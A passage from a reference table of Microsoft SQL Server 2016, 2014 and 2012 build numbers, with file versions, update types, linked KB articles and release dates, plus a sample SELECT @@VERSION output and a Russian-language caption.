| 13.0.2186.6 | 2015.130.2186.6 | RTM | CU | [3194717 MS16-136: Description of the security update for SQL Server 2016 CU](https://support.microsoft.com/en-us/kb/3194717) | 2016-11-08 | 2016-10-31 | |
| 13.0.2186.6 | 2015.130.2186.6 | RTM | CU | [3205413 Cumulative update 3 for SQL Server 2016](https://support.microsoft.com/en-us/kb/3205413) **Duplicate KB3194717** | 2016-11-08 | 2016-10-31 | |
| 13.0.2170.0 | 2015.130.2170.0 | RTM | COD | [3199171 On-demand hotfix update package for SQL Server 2016 CU2](https://support.microsoft.com/en-us/kb/3199171) | 2016-11-01 | 2016-10-11 | |
| 13.0.2169.0 | 2015.130.2169.0 | RTM | COD | [3195813 On-demand hotfix update package for SQL Server 2016 CU2](https://support.microsoft.com/en-us/kb/3195813) | 2016-10-26 | 2016-10-05 | |
| 13.0.2164.0 | 2015.130.2164.0 | RTM | CU | [3182270 Cumulative Update 2 for SQL Server 2016](https://support.microsoft.com/en-us/kb/3182270) | 2016-09-22 | 2016-09-09 | |
| 13.0.2149.0 | 2015.130.2149.0 | RTM | CU | [3164674 Cumulative Update 1 for SQL Server 2016](https://support.microsoft.com/en-us/kb/3164674) | 2016-07-25 | 2016-07-11 | |
| 13.0.1722.0 | 2015.130.1722.0 | RTM | COD | [3194716 MS16-136: Description of the security update for SQL Server 2016 GDR](https://support.microsoft.com/en-us/kb/3194716) | 2016-11-08 | 2016-10-31 | |
| 13.0.1711.0 | 2015.130.1711.0 | RTM | COD | [3179258 Processing a partition causes data loss on other partitions after the database is restored in SQL Server 2016 (1200)](http://support.microsoft.com/en-us/kb/3179258) | 2016-08-17 | 2016-07-30 | |
| 13.0.1708.0 | 2015.130.1708.0 | RTM | COD | [3164398 Critical update for SQL Server 2016 MSVCRT prerequisites](https://support.microsoft.com/en-us/kb/3164398) | 2016-06-04 | 2016-06-02 | |
| 13.0.1601.5 | 2015.130.1601.5 | RTM | RTM | [Microsoft SQL Server 2016 RTM](https://www.microsoft.com/en-us/evalcenter/evaluate-sql-server-2016) | 2016-06-01 | 2016-04-29 | |
| 13.0.1400.361 | 2015.130.1400.361 | RC | RC | Microsoft SQL Server 2016 Community Technology Release Candidate 3 (RC3) | 2016-04-15 | 2016-04-09 | |
| 13.0.1300.275 | 2015.130.1300.275 | RC | RC | Microsoft SQL Server 2016 Community Technology Release Candidate 2 (RC2) | 2016-04-01 | 2016-03-26 | |
| 13.0.1200.242 | 2015.130.1200.242 | RC | RC | Microsoft SQL Server 2016 Community Technology Release Candidate 1 (RC1) | 2016-03-18 | 2016-03-10 | |
| 13.0.1100.288 | 2015.130.1100.288 | RC | RC | Microsoft SQL Server 2016 Community Technology Release Candidate 0 (RC0) | 2016-03-07 | 2016-02-29 | |
| 13.0.1000.281 | 2015.130.1000.281 | CTP | CTP | Microsoft SQL Server 2016 Community Technology Preview 3.3 (CTP3.3) | 2016-02-03 | 2016-01-28 | |
| 13.0.900.73 | 2015.130.900.73 | CTP | CTP | Microsoft SQL Server 2016 Community Technology Preview 3.2 (CTP3.2) | 2015-12-17 | 2015-12-10 | |
| 13.0.801.12 | 2015.130.801.12 | CTP | CTP | Microsoft SQL Server 2016 Community Technology Preview 3.1 (CTP3.1 refresh) | 2015-12-05 | 2015-12-01 | |
| 13.0.801.111 | 2015.130.801.111 | CTP | CTP | Microsoft SQL Server 2016 Community Technology Preview 3.1 (CTP3.1) | 2015-11-30 | 2015-11-21 | |
| 13.0.700.242 | 2015.130.700.242 | CTP | CTP | Microsoft SQL Server 2016 Community Technology Preview 3.0 (CTP3.0) | 2015-10-29 | 2015-10-26 | |
| 13.0.600.65 | 2015.130.600.65 | CTP | CTP | Microsoft SQL Server 2016 Community Technology Preview 2.4 (CTP2.4) | 2015-09-30 | 2015-09-20 | |
| 13.0.500.53 | 2015.130.500.53 | CTP | CTP | Microsoft SQL Server 2016 Community Technology Preview 2.3 (CTP2.3) | 2015-08-28 | 2015-08-24 | |
| 13.0.407.1 | 2015.130.407.1 | CTP | CTP | Microsoft SQL Server 2016 Community Technology Preview 2.2 (CTP2.2) | 2015-07-29 | 2015-07-22 | |
| 13.0.400.91 | 2015.130.400.91 | CTP | CTP | Microsoft SQL Server 2016 Community Technology Preview 2.2 (CTP2.2) (withdrawn) | 2015-07-22 | 2015-07-16 | |
| 13.0.300.44 | 2015.130.300.444 | CTP | CTP | Microsoft SQL Server 2016 Community Technology Preview 2.1 (CTP2.1) | 2015-06-14 | 2015-06-12 | |
| 13.0.200.172 | 2015.130.200.172 | CTP | CTP | Microsoft SQL Server 2016 Community Technology Preview 2 (CTP2) | 2015-05-26 | 2015-05-21 | |
Microsoft SQL Server 2014 Builds
--------------------------------
Так выглядит результат выполнения запроса `SELECT @@VERSION` для актуальной версии SQL Server 2014 Developer Edition:
```
Microsoft SQL Server 2014 (SP2-CU3) (KB3204388) - 12.0.5538.0 (X64)
Dec 15 2016 17:52:48
Copyright (c) Microsoft Corporation
Developer Edition (64-bit) on Windows …
```
| Build | File version | Branch | Type | KB / Description | Release Date |
| --- | --- | --- | --- | --- | --- |
| 12.0.5538.0 | 2014.120.5538.0 | SP2 | CU | [3204388 Cumulative update 3 for SQL Server 2014 SP2](https://support.microsoft.com/en-us/kb/3204388) | 2016-12-28 |
| 12.0.5532.0 | 2014.120.5532.0 | SP2 | CU | [3194718 MS16-136: Description of the security update for SQL Server 2014 Service Pack 2 CU: November 8, 2016](https://support.microsoft.com/en-us/kb/3194718) | 2016-11-08 |
| 12.0.5522.0 | 2014.120.5522.0 | SP2 | CU | [3188778 Cumulative update 2 for SQL Server 2014 SP2](https://support.microsoft.com/en-us/kb/3188778) | 2016-10-18 |
| 12.0.5511.0 | 2014.120.5511.0 | SP2 | CU | [3178925 Cumulative update 1 for SQL Server 2014 SP2](https://support.microsoft.com/en-us/kb/3178925) | 2016-08-24 |
| 12.0.5000.0 | 2014.120.5000.0 | SP2 | SP | [3171021 SQL Server 2014 Service Pack 2 release information](https://support.microsoft.com/en-us/kb/3171021) | 2016-07-11 |
| 12.00.4491.0 | 2014.120.4491.0 | SP1 | CU | [3204399 Cumulative update package 10 (CU10) for SQL Server 2014 Service Pack 1](https://support.microsoft.com/en-us/kb/3204399) | 2016-12-28 |
| 12.0.4487.0 | 2014.120.4487.0 | SP1 | CU | [3194722 MS16-136: Description of the security update for SQL Server 2014 Service Pack 1 CU: November 8, 2016](https://support.microsoft.com/en-us/kb/3194722) | 2016-11-08 |
| 12.0.4474.0 | 2014.120.4474.0 | SP1 | CU | [3186964 Cumulative update 9 for SQL Server 2014 SP1](https://support.microsoft.com/en-us/kb/3186964) | 2016-10-18 |
| 12.0.4468.0 | 2014.120.4468.0 | SP1 | CU | [3174038 Cumulative update 8 for SQL Server 2014 SP1](https://support.microsoft.com/en-us/kb/3174038) | 2016-08-16 |
| 12.0.4463.0 | 2014.120.4463.0 | SP1 | COD | [3174370 COD Hotfix A memory leak occurs when you use Azure Storage in SQL Server 2014](https://support.microsoft.com/en-us/kb/3174370) | 2016-08-04 |
| 12.0.4459.0 | 2014.120.4459.0 | SP1 | CU | [3167392 Cumulative Update 7 for SQL Server 2014 SP1](https://support.microsoft.com/en-us/kb/3162659) | 2016-06-20 |
| 12.0.4457.0 | 2014.120.4457.0 | SP1 | CU | [3167392 Cumulative Update 6 for SQL Server 2014 Service Pack 1](https://support.microsoft.com/en-us/kb/3167392) **Refresh** | 2016-05-31 |
| 12.0.4452.0 | 2014.120.4452.0 | SP1 | COD | 3147825 COD Hotfix **Deprecated** | 2016-04-05 |
| 12.0.4449.0 | 2014.120.4449.0 | SP1 | CU | [3144524 Cumulative update 6 for SQL Server 2014 SP1 (deprecated)](https://support.microsoft.com/en-us/kb/3144524) **Deprecated** | 2016-04-18 |
| 12.0.4439.1 | 2014.120.4439.1 | SP1 | CU | [3130926 Cumulative Update 5 (CU5) for SQL Server 2014 Service Pack 1](https://support.microsoft.com/en-us/kb/3130926) | 2016-02-22 |
| 12.0.4437.0 | 2014.120.4437.0 | SP1 | COD | [3130999 On-demand hotfix update package for SQL Server 2014 Service Pack 1 Cumulative Update 4](https://support.microsoft.com/en-us/kb/3130999) | 2016-02-05 |
| 12.0.4436.0 | 2014.120.4436.0 | SP1 | CU | [3106660 Cumulative update package 4 (CU4) for SQL Server 2014 Service Pack 1](https://support.microsoft.com/en-us/kb/3106660) | 2015-12-21 |
| 12.0.4433.0 | 2014.120.4433.0 | SP1 | COD | [3119148 FIX: Error 3203 occurs and a SQL Server 2014 backup job can't restart after a network failure](http://support.microsoft.com/kb/3119148) | 2015-12-09 |
| 12.0.4432.0 | 2014.120.4432.0 | SP1 | COD | [3097972 FIX: Error when your stored procedure calls another stored procedure on a linked server in SQL Server 2014](http://support.microsoft.com/kb/3097972) | 2015-11-19 |
| 12.0.4427.24 | 2014.120.4427.24 | SP1 | CU | [3094221 Cumulative update package 3 (CU3) for SQL Server 2014 Service Pack 1](http://support.microsoft.com/kb/3094221) | 2015-10-21 |
| 12.0.4422.0 | 2014.120.4422.0 | SP1 | CU | [3075950 Cumulative update package 2 (CU2) for SQL Server 2014 Service Pack 1](http://support.microsoft.com/kb/3075950) | 2015-08-17 |
| 12.0.4419.0 | 2014.120.4419.0 | SP1 | COD | [3078973 An on-demand hotfix update package is available for SQL Server 2014 SP1](http://support.microsoft.com/kb/3078973) | 2015-07-24 |
| 12.0.4416.0 | 2014.120.4416.0 | SP1 | CU | [3067839 Cumulative update package 1 (CU1) for SQL Server 2014 Service Pack 1](http://support.microsoft.com/kb/3067839) | 2015-06-22 |
| 12.0.4232.0 | 2014.120.4232.0 | SP1 | CU | [3194720 MS16-136: Description of the security update for SQL Server 2014 Service Pack 1 GDR: November 8, 2016](https://support.microsoft.com/en-us/kb/3194720) | 2016-11-08 |
| 12.0.4219.0 | 2014.120.4219.0 | SP1 | GDR | [3098852 SP1 GDR TLS 1.2 Update](https://support.microsoft.com/en-us/hotfix/kbhotfix?kbnum=3098852&kbln=en-us) | 2016-01-29 |
| 12.0.4213.0 | 2014.120.4213.0 | SP1 | GDR | [3070446 MS15-058: Description of the nonsecurity update for SQL Server 2014 Service Pack 1 GDR: July 14, 2015](https://support.microsoft.com/en-us/kb/3070446) | 2015-07-14 |
| 12.0.4100.1 | 2014.120.4100.1 | SP1 | SP | [3058865 SQL Server 2014 Service Pack 1 release information](https://support.microsoft.com/en-us/kb/3058865) | 2015-05-14 |
| 12.0.4050.0 | 2014.120.4050.0 | SP1 | SP | SQL Server 2014 Service Pack 1 (SP1) (initial) | 2015-04-15 |
| 12.0.2569.0 | 2014.120.2569.0 | RTM | CU | [3158271 Cumulative update package 14 (CU14) for SQL Server 2014](https://support.microsoft.com/en-us/kb/3158271) | 2016-06-20 |
| 12.0.2568.0 | 2014.120.2568.0 | RTM | CU | [3144517 Cumulative update package 13 (CU13) for SQL Server 2014](https://support.microsoft.com/en-us/kb/3144517) | 2016-04-18 |
| 12.0.2564.0 | 2014.120.2564.0 | RTM | CU | [3130923 Cumulative update package 12 (CU12) for SQL Server 2014](https://support.microsoft.com/en-us/kb/3130923) | 2016-02-22 |
| 12.0.2560.0 | 2014.120.2550.0 | RTM | CU | [3106659 Cumulative update package 11 (CU11) for SQL Server 2014](http://support.microsoft.com/kb/3106659) | 2015-12-21 |
| 12.0.2556.4 | 2014.120.2556.4 | RTM | CU | [3094220 Cumulative update package 10 (CU10) for SQL Server 2014](http://support.microsoft.com/kb/3094220) | 2015-10-20 |
| 12.0.2553 | 2014.120.2553.0 | RTM | CU | [3075949 Cumulative update package 9 (CU9) for SQL Server 2014](http://support.microsoft.com/kb/3075949) | 2015-08-17 |
| 12.0.2548 | 2014.120.2548.0 | RTM | CU | [3045323 MS15-058: Description of the security update for SQL Server 2014 QFE: July 14, 2015](https://support.microsoft.com/en-us/kb/3045323) | 2015-07-14 |
| 12.0.2546 | 2014.120.2546.0 | RTM | CU | [3067836 Cumulative update package 8 (CU8) for SQL Server 2014](http://support.microsoft.com/kb/3067836) | 2015-06-22 |
| 12.0.2506 | 2014.120.2506.0 | RTM | COD | [3063054 Update enables Premium Storage support for Data files on Azure Storage and resolves backup failures](http://support.microsoft.com/kb/3063054) | 2015-05-19 |
| 12.0.2505 | 2014.120.2505.0 | RTM | COD | [3052167 FIX: Error 1205 when you execute parallel query that contains outer join operators in SQL Server 2014](http://support.microsoft.com/kb/3052167) | 2015-05-19 |
| 12.0.2504 | 2014.120.2504.0 | RTM | COD | [2999809 FIX: Poor performance when a query contains table joins in SQL Server 2014](http://support.microsoft.com/kb/2999809) | 2015-05-05 |
| 12.0.2504 | 2014.120.2504.0 | RTM | COD | [3058512 FIX: Unpivot Transformation task changes null to zero or empty strings in SSIS 2014](http://support.microsoft.com/kb/3058512) | 2015-05-05 |
| 12.0.2495 | 2014.120.2495.0 | RTM | CU | [3046038 Cumulative update package 7 (CU7) for SQL Server 2014](http://support.microsoft.com/kb/3046038) | 2015-04-23 |
| 12.0.2488 | 2014.120.2488.0 | RTM | COD | [3048751 FIX: Deadlock cannot be resolved automatically when you run a SELECT query that can result in a parallel batch-mode scan](http://support.microsoft.com/kb/3048751) | 2015-04-01 |
| 12.0.2485 | 2014.120.2485.0 | RTM | COD | [3043788 An on-demand hotfix update package is available for SQL Server 2014](http://support.microsoft.com/kb/3043788) | 2015-03-16 |
| 12.0.2480 | 2014.120.2480.0 | RTM | CU | [3031047 Cumulative update package 6 (CU6) for SQL Server 2014](http://support.microsoft.com/kb/3031047) | 2015-02-16 |
| 12.0.2474 | 2014.120.2474.0 | RTM | COD | [3034679 FIX: AlwaysOn availability groups are reported as NOT SYNCHRONIZING](http://support.microsoft.com/kb/3034679) | 2015-05-15 |
| 12.0.2472 | 2014.120.2472.0 | RTM | COD | [3032087 FIX: Cannot show requested dialog after you connect to the latest SQL Database Update V12 (preview) with SQL Server 2014](http://support.microsoft.com/kb/3032087) | 2015-01-28 |
| 12.0.2464 | 2014.120.2464.0 | RTM | COD | [3024815 Large query compilation waits on RESOURCE\_SEMAPHORE\_QUERY\_COMPILE in SQL Server 2014](http://support.microsoft.com/kb/3024815) | 2015-01-05 |
| 12.0.2456 | 2014.120.2456.0 | RTM | CU | [3011055 Cumulative update package 5 (CU5) for SQL Server 2014](http://support.microsoft.com/kb/3011055) | 2014-12-18 |
| 12.0.2436 | 2014.120.2436.0 | RTM | COD | [3014867 FIX: "Remote hardening failure" exception cannot be caught and a potential data loss when you use SQL Server 2014](http://support.microsoft.com/kb/3014867) | 2014-11-27 |
| 12.0.2430 | 2014.120.2430.0 | RTM | CU | [2999197 Cumulative update package 4 (CU4) for SQL Server 2014](http://support.microsoft.com/kb/2999197) | 2014-10-21 |
| 12.0.2423 | 2014.120.2423.0 | RTM | COD | [3007050 FIX: RTDATA\_LIST waits when you run natively stored procedures that encounter expected failures in SQL Server 2014](http://support.microsoft.com/kb/3007050) | 2014-10-22 |
| 12.0.2405 | 2014.120.2405.0 | RTM | COD | [2999809 FIX: Poor performance when a query contains table joins in SQL Server 2014](http://support.microsoft.com/kb/2999809) | 2014-09-25 |
| 12.0.2402 | 2014.120.2402.0 | RTM | CU | [2984923 Cumulative update package 3 (CU3) for SQL Server 2014](http://support.microsoft.com/kb/2984923) | 2014-08-18 |
| 12.0.2381 | 2014.120.2381.0 | RTM | QFE | [2977316 MS14-044: Description of the security update for SQL Server 2014 (QFE)](http://support.microsoft.com/kb/2977316) | 2014-08-12 |
| 12.0.2370 | 2014.120.2370.0 | RTM | CU | [2967546 Cumulative update package 2 (CU2) for SQL Server 2014](http://support.microsoft.com/kb/2967546) | 2014-06-27 |
| 12.0.2342 | 2014.120.2342.0 | RTM | CU | [2931693 Cumulative update package 1 (CU1) for SQL Server 2014](http://support.microsoft.com/kb/2931693) | 2014-04-21 |
| 12.0.2271.0 | 2014.120.2271.0 | RTM | GDR | [TLS 1.2 support for SQL Server 2014 RTM](https://support.microsoft.com/en-us/hotfix/kbhotfix?kbnum=3098856&kbln=en-us) | 2015-12-11 |
| 12.0.2269 | 2014.120.2269.0 | RTM | GDR | [3045324 MS15-058: Description of the security update for SQL Server 2014 GDR: July 14, 2015](https://support.microsoft.com/en-us/kb/3045324) | 2015-07-14 |
| 12.0.2254 | 2014.120.2254.0 | RTM | GDR | [2977315 MS14-044: Description of the security update for SQL Server 2014 (GDR)](http://support.microsoft.com/kb/2977315) | 2014-08-12 |
| 12.0.2000 | 2014.120.2000.8 | RTM | RTM | SQL Server 2014 RTM | 2014-04-01 |
| 12.0.1524 | 2014.120.1524.0 | CTP | CTP | Microsoft SQL Server 2014 Community Technology Preview 2 (CTP2) | 2013-10-15 |
| 11.0.9120 | 2013.110.9120.0 | CTP | CTP | Microsoft SQL Server 2014 Community Technology Preview 1 (CTP1) | 2013-06-25 |
Microsoft SQL Server 2012 Builds
--------------------------------
| Build | File version | Branch | Type | KB / Description | Release Date |
| --- | --- | --- | --- | --- | --- |
| 11.0.6579.0 | 2011.110.6579.0 | SP3 | CU | [3205051 Cumulative Update Package 7 for SQL Server 2012 SP3](https://support.microsoft.com/en-us/help/3205051/cumulative-update-7-for-sql-server-2012-sp3) | 2017-01-18 |
| 11.0.6567.0 | 2011.110.6567.0 | SP3 | COD | [3194724 MS16-136: Description of the security update for SQL Server 2012 Service Pack 3 CU: November 8, 2016](https://support.microsoft.com/en-us/kb/3194724) | 2016-11-17 |
| 11.0.6544.0 | 2011.110.6544.0 | SP3 | CU | [3180915 Cumulative update 5 for SQL Server 2012 Service Pack 3](https://support.microsoft.com/en-us/kb/3180915) | 2016-09-20 |
| 11.0.6540.0 | 2011.110.6540.0 | SP3 | CU | [3165264 Cumulative Update 4 for SQL Server 2012 SP3](https://support.microsoft.com/en-us/kb/3165264) | 2016-07-18 |
| 11.0.6537.0 | 2011.110.6537.0 | SP3 | CU | [3152635 Cumulative update package 3 for SQL Server 2012 SP3](https://support.microsoft.com/en-us/kb/3152635) | 2016-05-16 |
| 11.0.6523.0 | 2011.110.6523.0 | SP3 | CU | [3137746 Cumulative update package 2 for SQL Server 2012 SP3](https://support.microsoft.com/en-us/kb/3137746) | 2016-03-21 |
| 11.0.6518.0 | 2011.110.6518.0 | SP3 | CU | [3123299 Cumulative update package 1 for SQL Server 2012 SP3](https://support.microsoft.com/en-us/kb/3123299) | 2016-01-19 |
| 11.0.6248.0 | 2011.110.6248.0 | SP3 | GDR | [3194721 MS16-136: Description of the security update for SQL Server 2012 Service Pack 3 GDR: November 8, 2016](https://support.microsoft.com/en-us/kb/3194721) | 2016-11-08 |
| 11.0.6216.27 | 2011.110.6216.27 | SP3 | GDR | [3135244 TLS 1.2 support for SQL Server 2012 SP3 GDR](https://support.microsoft.com/en-us/kb/3135244) | 2016-01-27 |
| 11.3.6020.0 | 2011.110.6020.0 | SP3 | SP | [3072779 Microsoft SQL Server 2012 Service Pack 3 (SP3)](https://support.microsoft.com/en-us/kb/3072779) | 2015-11-21 |
| 11.0.5678.0 | 2011.110.5678.0 | SP2 | CU | [3205054 Cumulative Update 16 for SQL Server 2012 SP2](https://support.microsoft.com/en-us/help/3205054/cumulative-update-16-for-sql-server-2012-sp2) | 2017-01-18 |
| 11.0.5676.0 | 2011.110.5676.0 | SP2 | CU | [3205416 Cumulative update package 15 (CU15) for SQL Server 2012 Service Pack 2](https://support.microsoft.com/en-us/kb/3205416) | 2016-11-17 |
| 11.0.5676.0 | 2011.110.5676.0 | SP2 | COD | [3194725 MS16-136: Description of the security update for SQL Server 2012 Service Pack 2 CU: November 8, 2016](https://support.microsoft.com/en-us/kb/3194725) | 2016-11-17 |
| 11.0.5657.0 | 2011.110.5657.0 | SP2 | CU | [3180914 Cumulative Update 14 for SQL Server 2012 SP2](https://support.microsoft.com/en-us/kb/3180914) | 2016-09-20 |
| 11.0.5655.0 | 2011.110.5655.0 | SP2 | CU | [3165266 Cumulative Update 13 for SQL Server 2012 SP2](https://support.microsoft.com/en-us/kb/3165266) | 2016-07-18 |
| 11.0.5649.0 | 2011.110.5649.0 | SP2 | CU | [3152637 Cumulative update package 12 for SQL Server 2012 SP2](https://support.microsoft.com/en-us/kb/3152637) | 2016-05-16 |
| 11.0.5646.2 | 2011.110.5646.2 | SP2 | CU | [3137745 Cumulative update package 11 for SQL Server 2012 SP2](https://support.microsoft.com/en-us/kb/3137745) | 2016-03-21 |
| 11.0.5644.2 | 2011.110.5644.2 | SP2 | CU | [3120313 Cumulative update package 10 for SQL Server 2012 SP2](https://support.microsoft.com/en-us/kb/3120313) | 2016-01-19 |
| 11.0.5641.0 | 2011.110.5641.0 | SP2 | CU | [3098512 Cumulative update package 9 for SQL Server 2012 SP2](https://support.microsoft.com/en-us/kb/3098512) | 2015-11-16 |
| 11.0.5636 | 2011.110.5636.3 | SP2 | COD | [3097636 FIX: Performance decrease when application with connection pooling frequently connects or disconnects in SQL Server](https://support.microsoft.com/en-us/kb/3097636) | 2015-09-22 |
| 11.0.5634 | 2011.110.5634.0 | SP2 | CU | [3082561 Cumulative update package 8 (CU8) for SQL Server 2012 Service Pack 2](http://support.microsoft.com/kb/3082561) | 2015-09-21 |
| 11.0.5629 | 2011.110.5629.0 | SP2 | COD | [3087872 FIX: Access violations when you use the FileTable feature in SQL Server 2012](https://support.microsoft.com/en-us/kb/3087872) | 2015-08-31 |
| 11.0.5623 | 2011.110.5623.0 | SP2 | CU | [3072100 Cumulative update package 7 (CU7) for SQL Server 2012 Service Pack 2](http://support.microsoft.com/kb/3072100) | 2015-07-20 |
| 11.0.5613 | 2011.110.5613.0 | SP2 | COD | [3045319 MS15-058: Description of the security update for SQL Server 2012 Service Pack 2 QFE: July 14, 2015](https://support.microsoft.com/en-us/kb/3045319) | 2015-07-14 |
| 11.0.5592 | 2011.110.5592.0 | SP2 | CU | [3052468 Cumulative update package 6 (CU6) for SQL Server 2012 Service Pack 2](http://support.microsoft.com/kb/3052468) | 2015-05-19 |
| 11.0.5582 | 2011.110.5582.0 | SP2 | CU | [3037255 Cumulative update package 5 (CU5) for SQL Server 2012 Service Pack 2](http://support.microsoft.com/kb/3037255) | 2015-03-16 |
| 11.0.5571 | 2011.110.5571.0 | SP2 | COD | [3034679 FIX: AlwaysOn availability groups are reported as NOT SYNCHRONIZING](http://support.microsoft.com/kb/3034679) | 2015-05-15 |
| 11.0.5569 | 2011.110.5569.0 | SP2 | CU | [3007556 Cumulative update package 4 (CU4) for SQL Server 2012 Service Pack 2](http://support.microsoft.com/kb/3007556) | 2015-01-20 |
| 11.0.5556 | 2011.110.5556.0 | SP2 | CU | [3002049 Cumulative update package 3 (CU3) for SQL Server 2012 Service Pack 2](http://support.microsoft.com/kb/3002049) | 2014-11-17 |
| 11.0.5548 | 2011.110.5548.0 | SP2 | CU | [2983175 Cumulative update package 2 (CU2) for SQL Server 2012 Service Pack 2](http://support.microsoft.com/kb/2983175) | 2014-09-15 |
| 11.0.5532 | 2011.110.5532.0 | SP2 | CU | [2976982 Cumulative update package 1 (CU1) for SQL Server 2012 Service Pack 2](http://support.microsoft.com/kb/2976982) | 2014-07-24 |
| 11.0.5522 | 2011.110.5522.0 | SP2 | COD | [2969896 FIX: Data loss in clustered index occurs when you run online build index in SQL Server 2012 (Hotfix for SQL2012 SP2)](http://support.microsoft.com/kb/2969896) | 2014-06-20 |
| 11.0.5388 | 2012.110.5388.0 | SP2 | GDR | [3194719 MS16-136: Description of the security update for SQL Server 2012 Service Pack 2 GDR: November 8, 2016](https://support.microsoft.com/en-us/kb/3194719) | 2016-11-08 |
| 11.0.5352 | 2012.110.5352.0 | SP2 | GDR | [3135244 TLS 1.2 support for SQL Server 2012 SP2 GDR](https://support.microsoft.com/en-us/kb/3135244) | 2016-01-27 |
| 11.0.5343 | 2011.110.5343.0 | SP2 | GDR | [3045321 MS15-058: Description of the security update for SQL Server 2012 Service Pack 2 GDR: July 14, 2015](https://support.microsoft.com/en-us/kb/3045321) | 2015-07-14 |
| 11.0.5058 | 2011.110.5058.0 | SP2 | SP | [SQL Server 2012 Service Pack 2 (SP2)](http://www.microsoft.com/en-us/download/details.aspx?id=43340) | 2014-06-10 |
| 11.0.3513 | 2011.110.3513.0 | SP1 | QFE | [3045317 MS15-058: Description of the security update for SQL Server 2012 SP1 QFE: July 14, 2015](https://support.microsoft.com/en-us/kb/3045317) | 2015-07-14 |
| 11.0.3492 | 2011.110.3492.0 | SP1 | CU | [3052476 Cumulative update package 16 (CU16) for SQL Server 2012 Service Pack 1](http://support.microsoft.com/kb/3052476) | 2015-05-18 |
| 11.0.3487 | 2011.110.3487.0 | SP1 | CU | [3038001 Cumulative update package 15 (CU15) for SQL Server 2012 Service Pack 1](http://support.microsoft.com/kb/3038001) | 2015-03-16 |
| 11.0.3486 | 2011.110.3486.0 | SP1 | QFE | [3023636 Cumulative update package 14 (CU14) for SQL Server 2012 Service Pack 1](http://support.microsoft.com/kb/3023636) | 2015-01-19 |
| 11.0.3460 | 2011.110.3460.0 | SP1 | COD | [2977325 MS14-044: Description of the security update for SQL Server 2012 Service Pack 1 (QFE)](http://support.microsoft.com/kb/2977325) | 2014-08-12 |
| 11.0.3482 | 2011.110.3482.0 | SP1 | CU | [3002044 Cumulative update package 13 (CU13) for SQL Server 2012 Service Pack 1](http://support.microsoft.com/kb/3002044) | 2014-11-17 |
| 11.0.3470 | 2011.110.3470.0 | SP1 | CU | [2991533 Cumulative update package 12 (CU12) for SQL Server 2012 Service Pack 1](http://support.microsoft.com/kb/2991533) | 2014-09-15 |
| 11.0.3449 | 2011.110.3449.0 | SP1 | CU | [2975396 Cumulative update package 11 (CU11) for SQL Server 2012 Service Pack 1](http://support.microsoft.com/kb/2975396) | 2014-07-21 |
| 11.0.3437 | 2011.110.3437.0 | SP1 | COD | [2969896 FIX: Data loss in clustered index occurs when you run online build index in SQL Server 2012 (Hotfix for SQL2012 SP1)](http://support.microsoft.com/kb/2969896) | 2014-06-10 |
| 11.0.3431 | 2011.110.3431.0 | SP1 | CU | [2954099 Cumulative update package 10 (CU10) for SQL Server 2012 Service Pack 1](http://support.microsoft.com/kb/2954099) | 2014-05-19 |
| 11.0.3412 | 2011.110.3412.0 | SP1 | CU | [2931078 Cumulative update package 9 (CU9) for SQL Server 2012 Service Pack 1](http://support.microsoft.com/kb/2931078) | 2014-03-18 |
| 11.0.3401 | 2011.110.3401.0 | SP1 | CU | [2917531 Cumulative update package 8 (CU8) for SQL Server 2012 Service Pack 1](http://support.microsoft.com/kb/2917531) | 2014-01-20 |
| 11.0.3393 | 2011.110.3393.0 | SP1 | CU | [2894115 Cumulative update package 7 (CU7) for SQL Server 2012 Service Pack 1](http://support.microsoft.com/kb/2894115) | 2013-11-18 |
| 11.0.3381 | 2011.110.3381.0 | SP1 | CU | [2874879 Cumulative update package 6 (CU6) for SQL Server 2012 Service Pack 1](http://support.microsoft.com/kb/2874879) | 2013-09-16 |
| 11.0.3373 | 2011.110.3373.0 | SP1 | CU | [2861107 Cumulative update package 5 (CU5) for SQL Server 2012 Service Pack 1](http://support.microsoft.com/kb/2861107) | 2013-07-16 |
| 11.0.3368 | 2011.110.3368.0 | SP1 | CU | [2833645 Cumulative update package 4 (CU4) for SQL Server 2012 Service Pack 1](http://support.microsoft.com/kb/2833645) | 2013-05-31 |
| 11.0.3350 | 2011.110.3350.0 | SP1 | COD | [2832017 FIX: You can’t create or open SSIS projects or maintenance plans after you apply Cumulative Update 3 for SQL Server 2012 SP1](http://support.microsoft.com/kb/2832017) | 2013-04-17 |
| 11.0.3349 | 2011.110.3349.0 | SP1 | CU | [2812412 Cumulative update package 3 (CU3) for SQL Server 2012 Service Pack 1](http://support.microsoft.com/kb/2812412) | 2013-03-18 |
| 11.0.3339 | 2011.110.3339.0 | SP1 | CU | [2790947 Cumulative update package 2 (CU2) for SQL Server 2012 Service Pack 1](http://support.microsoft.com/kb/2790947) | 2013-01-25 |
| 11.0.3335 | 2011.110.3335.0 | SP1 | COD | [2800050 FIX: Component installation process fails after you install SQL Server 2012 SP1](http://support.microsoft.com/kb/2800050) | 2013-01-14 |
| 11.0.3321 | 2011.110.3321.0 | SP1 | CU | [2765331 Cumulative update package 1 (CU1) for SQL Server 2012 Service Pack 1](http://support.microsoft.com/kb/2765331) | 2012-11-20 |
| 11.0.3156 | 2011.110.3156.0 | SP1 | COD | [3045318 MS15-058: Description of the security update for SQL Server 2012 SP1 GDR: July 14, 2015](https://support.microsoft.com/en-us/kb/3045318) | 2015-07-14 |
| 11.0.3153 | 2011.110.3153.0 | SP1 | GDR | [2977326 MS14-044: Description of the security update for SQL Server 2012 Service Pack 1 (GDR)](http://support.microsoft.com/kb/2977326) | 2014-08-12 |
| 11.0.3128 | 2011.110.3128.0 | SP1 | COD | [2793634 Windows Installer starts repeatedly after you install SQL Server 2012 SP1](http://support.microsoft.com/kb/2793634) | 2013-01-03 |
| 11.0.3000 | 2011.110.3000.0 | SP1 | SP | [SQL Server 2012 Service Pack 1 (SP1)](http://www.microsoft.com/en-us/download/details.aspx?id=35575) | 2012-11-06 |
| 11.0.2845 | 2011.110.2845.0 | SP1 | CTP | SQL Server 2012 Service Pack 1 Customer Technology Preview 4 (CTP4) | 2012-09-20 |
| 11.0.2809 | 2011.110.2809.24 | SP1 | CTP | SQL Server 2012 Service Pack 1 Customer Technology Preview 3 (CTP3) | 2012-07-05 |
| 11.0.2424 | 2011.110.2424.0 | RTM | CU | [2908007 Cumulative update package 11 (CU11) for SQL Server 2012](http://support.microsoft.com/kb/2908007) | 2013-12-17 |
| 11.0.2420 | 2011.110.2420.0 | RTM | CU | [2891666 Cumulative update package 10 (CU10) for SQL Server 2012](http://support.microsoft.com/kb/2891666) | 2013-10-21 |
